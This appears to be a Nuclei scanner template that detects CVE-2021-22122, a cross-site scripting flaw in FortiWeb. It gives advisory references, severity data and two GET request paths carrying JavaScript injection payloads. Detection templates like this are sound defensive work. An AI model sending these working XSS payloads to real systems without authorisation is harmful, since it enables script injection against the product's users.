36 lines
1.2 KiB
YAML
36 lines
1.2 KiB
YAML
id: CVE-2021-22122
|
|
|
|
info:
|
|
name: FortiWeb - Cross-Site Scripting
|
|
author: dwisiswant0
|
|
severity: medium
|
|
description: |
|
|
FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points.
|
|
reference:
|
|
- https://www.fortiguard.com/psirt/FG-IR-20-122
|
|
- https://twitter.com/ptswarm/status/1357316793753362433
|
|
- https://fortiguard.com/advisory/FG-IR-20-122
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-22122
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-22122
|
|
cwe-id: CWE-79
|
|
tags: cve,cve2021,fortiweb,xss
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/error3?msg=30&data=';alert('nuclei');//"
|
|
- "{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('nuclei');//"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "nuclei"
|
|
- "No policy has been chosen."
|
|
condition: and
|
|
part: body
|
|
|
|
# Enhanced by mp on 2022/09/02
|